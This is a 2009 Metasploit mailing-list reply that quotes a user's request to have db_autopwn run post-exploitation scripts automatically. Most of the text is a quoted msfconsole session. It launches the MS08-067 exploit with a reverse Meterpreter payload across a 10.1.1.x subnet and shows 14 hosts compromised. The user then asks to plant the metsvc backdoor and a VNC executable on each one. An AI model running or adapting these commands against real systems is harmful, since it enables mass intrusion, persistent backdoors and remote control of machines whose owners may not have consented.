Metasploit mailing list archives
Re: Suggestion for db_autopwn
From: Terrence <secretpackets () gmail com>
Date: Mon, 7 Dec 2009 16:59:04 -0500
Can't you just reverse them to another adress running multi/handler. Set your auto script in the multi handler. I know the autorun in multi/handler works like a champ. On 12/07/2009, David Guimaraes <skysbsb () gmail com> wrote:
I don't know if this already exists, but i want to be able to run a automatic script when i was able to exploit some machine with db_autopwn.. because i have to do this(post-exploitation) manualy after the explotation.. I have a situation with 14 machines/sessions opened after the db_autopwn runs, and i want to execute a script like this in the 14 sessions.metsvc (post exploitation bd) uploadexec -e lv.exe (bind/execute vnc)Even i setting the AutoRunScript to execute a file with this cmds does not work. root@skys-laptop:/pentest/exploits/framework3# ./msfconsole -rresourcers/lanhouse.cfg ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v3.4-dev [core:3.4 api:1.0] + -- --=[ 458 exploits - 221 auxiliary + -- --=[ 262 payloads - 22 encoders - 8 nops =[ svn r7744 updated today (2009.12.07)resource> use exploit/windows/smb/ms08_067_netapiresource> set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp resource> set LHOST 10.1.1.103 LHOST => 10.1.1.103 resource> set AutoRunScript multiscript -s /pentest/exploits/framework3/ar.txt AutoRunScript => multiscript -s /pentest/exploits/framework3/ar.txt resource> set ExitOnSession false ExitOnSession => false resource> db_destroy teste [*] Deleting teste... resource> db_create teste [*] Creating a new database instance... [*] Successfully connected to the database [*] File: teste resource> db_nmap -n -p 445 10.1.1.2-254 -T5 Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-07 19:08 BRST ...Nmap done: 253 IP addresses (18 hosts up) scanned in 4.64 seconds resource> db_autopwn -b -m ms08_067_netapi -p -e[*] (1/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.19:445... [*] (2/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.14:445... [*] (3/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.4:445... [*] (4/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.11:445... [*] (5/16 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.9:445... [*] Job limit reached, waiting on modules to finish... [*] Meterpreter session 1 opened (10.1.1.56:50012 -> 10.1.1.19:32145) [*] Meterpreter session 2 opened (10.1.1.56:54158 -> 10.1.1.11:13307) [*] Meterpreter session 3 opened (10.1.1.56:44616 -> 10.1.1.4:11042) [*] Meterpreter session 4 opened (10.1.1.56:40018 -> 10.1.1.14:10421) [*] (6/16 [4 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.10:445... [*] Meterpreter session 5 opened (10.1.1.56:57958 -> 10.1.1.9:6209) [*] (7/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.12:445... [*] (8/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.5:445... [*] Job limit reached, waiting on modules to finish... [*] (9/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.7:445... [*] (10/16 [5 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.6:445... [*] Job limit reached, waiting on modules to finish... [*] Meterpreter session 6 opened (10.1.1.56:54945 -> 10.1.1.5:22232) [*] (11/16 [6 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.51:445... [*] Job limit reached, waiting on modules to finish... [*] Meterpreter session 7 opened (10.1.1.56:36052 -> 10.1.1.6:25321) [*] Meterpreter session 8 opened (10.1.1.56:47654 -> 10.1.1.10:26463) [*] Meterpreter session 9 opened (10.1.1.56:58837 -> 10.1.1.7:22313) [*] (12/16 [9 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.8:445... [*] (13/16 [9 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.20:445... [*] Job limit reached, waiting on modules to finish... [*] Meterpreter session 10 opened (10.1.1.56:44769 -> 10.1.1.12:13791) [*] (14/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.17:445... [*] Job limit reached, waiting on modules to finish... [*] (15/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.3:445... [*] (16/16 [10 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 10.1.1.2:445... [*] (16/16 [10 sessions]): Waiting on 5 launched modules to finish execution... [*] Meterpreter session 11 opened (10.1.1.56:43583 -> 10.1.1.20:7354) [*] (16/16 [11 sessions]): Waiting on 5 launched modules to finish execution... [*] Meterpreter session 12 opened (10.1.1.56:54405 -> 10.1.1.17:6410) [*] Meterpreter session 13 opened (10.1.1.56:40651 -> 10.1.1.8:8901) [*] Meterpreter session 14 opened (10.1.1.56:47355 -> 10.1.1.3:21465) [*] (16/16 [14 sessions]): Waiting on 1 launched modules to finish execution... msf exploit(ms08_067_netapi) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 10.1.1.56:50012 -> 10.1.1.19:32145 2 Meterpreter 10.1.1.56:54158 -> 10.1.1.11:13307 3 Meterpreter 10.1.1.56:44616 -> 10.1.1.4:11042 4 Meterpreter 10.1.1.56:40018 -> 10.1.1.14:10421 5 Meterpreter 10.1.1.56:57958 -> 10.1.1.9:6209 6 Meterpreter 10.1.1.56:54945 -> 10.1.1.5:22232 7 Meterpreter 10.1.1.56:36052 -> 10.1.1.6:25321 8 Meterpreter 10.1.1.56:47654 -> 10.1.1.10:26463 9 Meterpreter 10.1.1.56:58837 -> 10.1.1.7:22313 10 Meterpreter 10.1.1.56:44769 -> 10.1.1.12:13791 11 Meterpreter 10.1.1.56:43583 -> 10.1.1.20:7354 12 Meterpreter 10.1.1.56:54405 -> 10.1.1.17:6410 13 Meterpreter 10.1.1.56:40651 -> 10.1.1.8:8901 14 Meterpreter 10.1.1.56:47355 -> 10.1.1.3:21465Making db_autopwn execute the AutoRunScript parameter after the success exploitation will help me alot. -- David Gomes GuimarĂ£es
-- Terrence Gareau _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Suggestion for db_autopwn David Guimaraes (Dec 07)
- Re: Suggestion for db_autopwn Terrence (Dec 07)
- Re: Suggestion for db_autopwn HD Moore (Dec 07)
- Re: Suggestion for db_autopwn David Guimaraes (Dec 08)
- Re: Suggestion for db_autopwn HD Moore (Dec 08)
- Re: Suggestion for db_autopwn HD Moore (Dec 07)
- Re: Suggestion for db_autopwn Terrence (Dec 07)